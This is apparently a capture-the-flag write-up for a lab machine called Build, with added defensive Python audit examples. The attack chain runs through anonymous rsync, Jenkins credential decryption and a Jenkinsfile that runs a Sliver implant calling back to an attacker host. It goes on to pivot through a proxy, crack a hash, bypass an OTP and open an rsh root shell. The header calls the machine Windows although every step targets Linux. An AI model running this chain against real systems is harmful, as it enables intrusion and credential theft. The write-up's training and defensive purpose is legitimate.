
Machine (Easy) - Build

Writeup Author: bobbuilder


Overview

Category: Machine

Difficulty: Easy

Machine Author: xct

Domain: build.vl

Machine: Windows

Objective: Gain a root shell on the target by abusing exposed rsync backups, injecting a payload through Jenkins, pivoting into the internal network, and exploiting misconfigured services to escalate privileges.


User

Enumeration

Identify exposed RPC services and rsync shares:

rpcinfo -p <build_ip>
rsync <build_ip>::

List contents of the backups share:

rsync <build_ip>::backups

Download the Jenkins backup archive:

rsync -avzP <build_ip>::backups/jenkins.tar.gz
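The enumeration above works because the `backups` module is exported by the rsync daemon with no authentication and no source-address restriction. The following is an added example (not part of the original writeup, and not a tool from the machine) that parses an rsyncd.conf and flags modules exposed that way; the configuration it reads is constructed inline for the demonstration, with one module in the weak state and one in the corrected state.

```python
# Audit rsyncd.conf modules for anonymous or unrestricted exposure.
# Added example with a constructed sample config; not the writeup's tooling.

# Constructed rsyncd.conf: "backups" is the weak module (anonymous, world-reachable),
# "uploads" shows the corrected settings (auth users + secrets file + hosts allow).
SAMPLE_RSYNCD_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes

[backups]
    path = /srv/backups
    comment = Jenkins backups
    read only = yes
    list = yes

[uploads]
    path = /srv/uploads
    read only = no
    auth users = ci
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
"""


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf into {module: {key: value}}.

    Keys before the first [module] header are stored under "__global__".
    Keys are case-insensitive in rsyncd.conf, so they are lower-cased here.
    """
    modules = {"__global__": {}}
    current = "__global__"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            modules[current][key.strip().lower()] = value.strip()
    return modules


def _is_no(value, default="yes"):
    return (value if value is not None else default).lower() in ("no", "false", "0")


def audit_rsync_modules(conf):
    """Return (module, finding) tuples for modules exposed without auth or restriction."""
    findings = []
    for name, opts in conf.items():
        if name == "__global__":
            continue
        auth_users = opts.get("auth users", "")
        if auth_users == "":
            findings.append((name, "no 'auth users': anonymous access permitted"))
        elif not opts.get("secrets file"):
            findings.append((name, "'auth users' set but no 'secrets file'"))
        if not opts.get("hosts allow"):
            findings.append((name, "no 'hosts allow': reachable from any source address"))
        if _is_no(opts.get("read only")) and auth_users == "":
            findings.append((name, "writable module without authentication"))
        if not _is_no(opts.get("list")):
            findings.append((name, "module is listed by 'rsync host::' (list = yes)"))
    return findings


if __name__ == "__main__":
    for module, finding in audit_rsync_modules(parse_rsyncd_conf(SAMPLE_RSYNCD_CONF)):
        print(f"[{module}] {finding}")
```

Against the constructed config the `backups` module produces three findings (anonymous, unrestricted, listed) while `uploads` only reports that it is listed; `list = no` hides a module from the `rsync host::` enumeration, but only authentication and `hosts allow` actually stop the download.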

Initial Access

Extract the archive and locate stored Jenkins credentials:

cat jenkins_configuration/jobs/build/config.xml

Decrypt the stored Jenkins password:

python invoke.py \
  --master-key ./master.key \
  --hudson-secret-key ./hudson.util.Secret \
  --action decrypt '{AQAAABAAAAAQUNB...}'
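The decryption step only works because the backup archive carries both the key material (`master.key`, `hudson.util.Secret`) and the XML files holding the encrypted values, so the archive on its own is enough to recover plaintext credentials. The following is an added example (not from the writeup, and not a Jenkins or invoke.py routine) that inspects a Jenkins backup tarball in memory and reports key-material files and XML files containing Jenkins-style `{base64}` encrypted values; the archive it scans is constructed inline, and the path list and regex are the example's own assumptions about a Jenkins home layout.

```python
# Check a Jenkins backup archive for key material and encrypted secrets
# before it is copied anywhere. Added example with a constructed archive.
import io
import re
import tarfile

# Files under JENKINS_HOME that, together, let a holder of the archive
# decrypt every stored credential (assumed layout for this example).
KEY_MATERIAL = (
    "secrets/master.key",
    "secrets/hudson.util.Secret",
    "credentials.xml",
    "secrets/initialAdminPassword",
)

# Jenkins writes encrypted values as {base64}; flag any such token in XML.
ENCRYPTED_VALUE = re.compile(r"\{[A-Za-z0-9+/=]{20,}\}")


def audit_jenkins_backup(archive_bytes):
    """Return {"key_material": [paths], "encrypted_values": {path: count}}."""
    report = {"key_material": [], "encrypted_values": {}}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            name = member.name
            if any(name.endswith(p) for p in KEY_MATERIAL):
                report["key_material"].append(name)
            if name.endswith(".xml"):
                data = tar.extractfile(member).read().decode("utf-8", "replace")
                hits = ENCRYPTED_VALUE.findall(data)
                if hits:
                    report["encrypted_values"][name] = len(hits)
    return report


def build_sample_backup():
    """Constructed Jenkins-like backup (in memory) for the demonstration."""
    files = {
        "jenkins_configuration/secrets/master.key": b"0123456789abcdef" * 8,
        "jenkins_configuration/secrets/hudson.util.Secret": b"\x00" * 272,
        "jenkins_configuration/jobs/build/config.xml": (
            b"<project><scm><userRemoteConfigs>"
            b"<credentialsId>git-creds</credentialsId>"
            b"</userRemoteConfigs></scm></project>"
        ),
        "jenkins_configuration/credentials.xml": (
            b"<credentials><password>"
            b"{AQAAABAAAAAQc29tZV9jb25zdHJ1Y3RlZF92YWx1ZQ==}"   # constructed value
            b"</password></credentials>"
        ),
        "jenkins_configuration/jobs/build/builds/1/log": b"Started by user admin\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    result = audit_jenkins_backup(build_sample_backup())
    for path in result["key_material"]:
        print("key material:", path)
    for path, count in result["encrypted_values"].items():
        print(f"encrypted values: {path} ({count})")
```

Any archive that lists both `secrets/master.key` and `secrets/hudson.util.Secret` next to files with `{...}` values should be treated as plaintext credentials; the fix is to exclude the `secrets/` directory from backups that leave the host (or encrypt the archive), not only to restrict the rsync share.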

Clone the Git repository using the recovered credentials:

git clone 'http://<username>:<password>@<build_ip>:3000/buildadm/dev.git'

Generate a Sliver payload:

sliver > generate --os linux --arch 64bit --mtls <attacker_ip> --format elf --reconnect 60 --save htb_sliver

Modify Jenkinsfile to execute the payload:

stage('Do nothing') {
  steps {
    sh 'chmod +x htb_sliver && ./htb_sliver'
  }
}

Push the malicious commit to trigger code execution:

git add htb_sliver
git commit -am "trigger sliver"
git push

Root

Start a SOCKS proxy from the active Sliver session:

socks5 start

Configure proxychains:

echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.conf

Scan the internal network via proxy:

proxychains4 nmap -p- 172.18.0.1

Privilege Escalation

Connect to internal MySQL service:

proxychains4 mysql -h 172.18.0.1 -u root

Dump the PowerDNS Admin user table:

USE powerdnsadmin;
SELECT * FROM user;

Crack the retrieved bcrypt hash:

hashcat -a0 -m 3200 '$2b$12$...' rockyou.txt

Access the PowerDNS Admin interface (via proxy):

http://172.18.0.6/login

Bypass OTP using a blank or space character (per known issue).
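The bypass above belongs to a general class of second-factor bugs: the OTP check is only run when a token is actually supplied, so an empty or whitespace token is treated as "nothing to verify". The following is an added example (not PowerDNS Admin's code, and not from the writeup) that implements RFC 4226/6238 HOTP/TOTP with the standard library and then shows that fail-open login pattern beside a fail-closed one; the user record, password and secrets are constructed for the demonstration.

```python
# Fail-open versus fail-closed second-factor verification.
# Added example; the vulnerable function reproduces the bug class, not any real project's code.
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP (HMAC-SHA1) over a base32-encoded secret."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32, at=None, step=30):
    """RFC 6238 TOTP for the current (or a given) Unix time."""
    t = int(time.time() if at is None else at)
    return hotp(secret_b32, t // step)


def verify_totp(secret_b32, token, at=None, step=30, window=1):
    """Accept the current time step plus/minus `window` steps; constant-time compare."""
    t = int(time.time() if at is None else at)
    ok = False
    for drift in range(-window, window + 1):
        # Evaluate every candidate so timing does not reveal which step matched.
        ok |= hmac.compare_digest(hotp(secret_b32, t // step + drift), token)
    return ok


def login_fail_open(user, password, otp_token, at=None):
    """Vulnerable pattern: the OTP is only checked when a non-blank token arrives,
    so "" or " " skips the second factor even though one is enrolled."""
    if password != user["password"]:
        return False
    if user["otp_secret"] and otp_token and otp_token.strip():
        return verify_totp(user["otp_secret"], otp_token.strip(), at=at)
    return True  # no token submitted -> treated as "no OTP to check"


def login_fail_closed(user, password, otp_token, at=None):
    """Hardened: an enrolled second factor is always required, and anything that
    is not exactly a six-digit string is rejected before verification."""
    if not hmac.compare_digest(password, user["password"]):
        return False
    if not user["otp_secret"]:
        return True
    if not isinstance(otp_token, str) or len(otp_token) != 6 or not otp_token.isdigit():
        return False
    return verify_totp(user["otp_secret"], otp_token, at=at)


if __name__ == "__main__":
    # Constructed user; the base32 secret is the RFC 6238 test key "12345678901234567890".
    user = {"username": "admin", "password": "constructed-pw",
            "otp_secret": "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"}
    for token in ("", " ", totp(user["otp_secret"])):
        print(repr(token), "fail-open:", login_fail_open(user, "constructed-pw", token),
              "fail-closed:", login_fail_closed(user, "constructed-pw", token))
```

The structural difference is where the default sits: the vulnerable version defaults to success and only fails when a supplied token is wrong, while the hardened version defaults to failure whenever a second factor is enrolled and only succeeds on a well-formed token that verifies.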

Update /etc/hosts with DNS mapping:

echo "<admin_ip> admin.build.vl" | sudo tee -a /etc/hosts

Flag Retrieval

Access remote root shell via rsh:

rsh -l root admin.build.vl